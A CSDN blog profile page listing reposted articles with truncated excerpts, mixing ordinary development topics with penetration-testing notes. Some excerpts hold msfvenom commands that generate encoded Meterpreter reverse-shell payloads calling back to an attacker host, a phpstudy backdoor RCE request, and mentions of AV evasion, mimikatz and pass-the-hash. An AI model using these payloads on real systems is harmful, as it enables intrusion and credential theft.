weixin_30886233
码龄7年
  • 606,587
    被访问
  • 暂无
    原创
  • 550,143
    排名
  • 75
    粉丝
关注
提问 私信
  • 加入CSDN时间: 2015-08-27
博客简介:

weixin_30886233的博客

查看详细资料
个人成就
  • 获得131次点赞
  • 内容获得0次评论
  • 获得816次收藏
创作历程
  • 741篇
    2019年
  • 756篇
    2018年
  • 731篇
    2017年
  • 534篇
    2016年
  • 409篇
    2015年
  • 295篇
    2014年
  • 295篇
    2013年
  • 208篇
    2012年
  • 141篇
    2011年
  • 130篇
    2010年
  • 102篇
    2009年
  • 72篇
    2008年
  • 58篇
    2007年
  • 44篇
    2006年
  • 23篇
    2005年
  • 14篇
    2004年
成就勋章
  • 最近
  • 文章
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

.Net Core部署在Linux服务器:Nginx反向代理+Supervisor进程守护

前言:.Net Core程序(网站)可以部署在windows IIS ,也可以部署在Linux系统(更加推荐)本文部署,基于.net core 2.1,服务器CentOS 7, 需要安装的服务有2个:Nginx,SuperVisor(进程守护)命令预览:Linux: 重启:rebootNginx: 强杀: killall -9 nginx    测试配置...
转载
发布博客 2019.10.04 ·
209 阅读 ·
0 点赞 ·
0 评论

Windows 和 Linux 下安装MySql

一、windows下安装mysql1.下载mysql包:https://dev.mysql.com/downloads/mysql/2.解压到特定的地方即可(当作是已安装的文件使用,我这样使用免安装的方法)如我的习惯:D:\software是用用来做软件安装的路径。把mysql-8.0.17-winx64解压到这里(免安装):3.配置环境变量(我...
转载
发布博客 2019.10.01 ·
242 阅读 ·
0 点赞 ·
0 评论

新功能引导实现

新功能引导实现的思路:1.类似于intro.js的实现,通过html元素id或者其它属性找到该dom节点,将其z-index调至较高层级;如果新功能需要可点击操作,则使用该种方法2.使用css的outline属性.guide { outline: 9999px solid rgba(0,0,0,.75);}  以上方法在火狐浏览器会有兼容性问...
转载
发布博客 2019.09.26 ·
273 阅读 ·
0 点赞 ·
0 评论

vue的keep-alive实现框架页签功能

在web页面实现类似于浏览器的页签功能,使用vue的keep-alive组件做缓存基本实现如下:1.将需要做缓存的视图用keep-alive包裹<keep-alive :include="keepAliveComponents"> <router-view></router-view> ...
转载
发布博客 2019.09.26 ·
207 阅读 ·
0 点赞 ·
0 评论

phpstudy后门rce批量利用脚本

写两个一个批量检测的 一个交互式shell的暂时py 图形化的qt写出来..有点问题后门包 :GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept:...
转载
发布博客 2019.09.23 ·
762 阅读 ·
1 点赞 ·
0 评论

理解指针那些事

复习C/C++又到指针这里,想起大一那时候第一次学C这个简单的问题弄了好久都没理解,也是笨关于指针在我第一次学的时候觉得绕来绕去以至于就没理解到就混了过去,网上很多文章讲指针都能讲错也是服了最近很想说的话: 很多以前学过的基础的东西还是有的模棱两可,学了一次不叫会了,写了博客也不叫会了,得熟记于心能运用才叫会。目录: ...
转载
发布博客 2019.09.19 ·
94 阅读 ·
0 点赞 ·
0 评论

2019关于phpstudy软件后门简单分析

2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件 说是官网下的就没有后门20号出现的新闻 今天phpstudy官网21号又更新一波 不太好说这是什么操作哦 此地无银三百两?很开心的说 我以前的虚拟机装的应该是有后门版本(任何文件我从来都是官网下文件) 用cha...
转载
发布博客 2019.09.21 ·
99 阅读 ·
0 点赞 ·
0 评论

代码审计-thinkphp3.2.3框架漏洞sql注入

开始复现审计一下tp3和tp5的框架漏洞,当个练习吧。涉及注入的方法为where() table()delete()等。环境tp3.2.3 :0x01注入成因测试代码: public function index2(){// $data = M('user')-> where('username...
转载
发布博客 2019.09.02 ·
560 阅读 ·
0 点赞 ·
0 评论

代码审计-Thinkphp3框架EXP表达式SQL注入

最近看java框架源码也是看的有点头疼,好多还要复习熟悉还有好多事没做...慢慢熬。网上好像还没有特别详细的分析我来误人子弟吧。0x01tp3中的exp表达式查询表达式的使用格式:$map['字段名'] = array('表达式','查询条件');表达式不分大小写,支持的查询表达式有下面几种,分别表示的含义是:...
转载
发布博客 2019.09.16 ·
114 阅读 ·
0 点赞 ·
0 评论

渗透测试-端口复用正向后门

补充一下端口复用的知识0x01关于端口复用端口复用也是很老的后门技术,主要是劫持web服务器相关进程/服务的内存空间、系统API甚至劫持网络驱动去达到目的,在winsocket的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分。这种多重绑定便称之为端口复用。这里总结的是基于we...
转载
发布博客 2019.08.29 ·
107 阅读 ·
0 点赞 ·
0 评论

后门免杀工具-Backdoor-factory

水一水最近玩的工具弄dll注入的时候用到的介绍这款老工具免杀效果一般。。但是简单实用目录:    0x01backdoor-factory简介    0x02特点功能    0x03具体参数使用    PS:后门添加私钥证书https://tools.kali.org/exploitation-tools/bac...
转载
发布博客 2019.08.28 ·
251 阅读 ·
1 点赞 ·
0 评论

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

0x01 Metasploit派生shell给Cobaltstrike生成木马:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe[-] No platform wa...
转载
发布博客 2019.09.14 ·
184 阅读 ·
0 点赞 ·
0 评论

记个mimikatz小坑

今晚回学校无聊搞搞自己school 实战的时候遇到mimikatz抓密码报错 以前没遇过记一下(水一篇)爆ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061开始以为又是上次2008注册表组策略的问题结果runas就解决...
转载
发布博客 2019.09.01 ·
361 阅读 ·
0 点赞 ·
0 评论

实战渗透测试笔记分享

分享下自己一直收集和使用的笔记方便快速查找。链接:https://pan.baidu.com/s/1QopVQj3yMAWY1EU5xWEecQ提取码:X3b1转载于:https://www.cnblogs.com/-qing-/p/11403328.html...
转载
发布博客 2019.08.24 ·
179 阅读 ·
0 点赞 ·
0 评论

后门木马免杀-msfvenom和msf5(evasion)

贴上使用笔记不多介绍了 很简单的东西msfvenom各平台生成木马大全:windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f e...
转载
发布博客 2019.08.28 ·
347 阅读 ·
0 点赞 ·
0 评论

域渗透-凭据传递攻击(pass the hash)完全总结

总结下PtH具体形式(wmicexec、powershell、msf等)0x01PtH攻击原理 &&黄金白银票据PtH攻击原理wikihttps://en.wikipedia.org/wiki/Pass_the_hash写的也很清楚其中重要的是windows使用系统API(LsaLogonUser)生成...
转载
发布博客 2019.08.18 ·
976 阅读 ·
0 点赞 ·
0 评论

域渗透-Kerberos协议中spn的应用

0x01关于SPN服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。服务主体名称是服务实例(可以理解为一个服务,比如 HTTP、MSSQL)的唯一标识符。Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。在内部网络中,SPN扫描通过 查询向域控制器执行服务发现。这对于红队而言,可以帮助...
转载
发布博客 2019.08.27 ·
139 阅读 ·
0 点赞 ·
0 评论

渗透系统虚拟机----win7(渗透工具包)

今天把自己用的win7渗透虚拟机和渗透工具脚本整合到一起备份传网盘了:D:\渗透工具包>dir 驱动器 D 中的卷是 DATA 卷的序列号是 0D74-084B D:\渗透工具包 的目录2019/09/08 17:30 <DIR> .2019/09/08 17:30 ...
转载
发布博客 2019.09.08 ·
1845 阅读 ·
3 点赞 ·
0 评论

django虚拟环境配置

1.由于pip中自带的安装源下载太慢,可以自己配置下载源1):文件管理器文件路径地址栏敲%APPDATA%2):在这个文件下创建一个新的pip文件并在这个文件下创建一个,pip.ini文件3):在这个文件中添加配置内容[global]index-url = http://pypi.douban.com/simple[install]use-mirrors ...
转载
发布博客 2019.08.21 ·
55 阅读 ·
0 点赞 ·
0 评论

django中配置文件的原理

项目中我们配置文件是怎么执行的喃?1,在我们创建一个Django项目的时候,Django中的manage.py这个文件就会自动把我们的setting这个加载到全局配置中2.在全局的配置中,我们加载到,暴露给用户的setting配置,在LazySettings(LazyObject) 类中获取到暴露给用户的setting在LazySettin...
转载
发布博客 2019.07.31 ·
63 阅读 ·
0 点赞 ·
0 评论
加载更多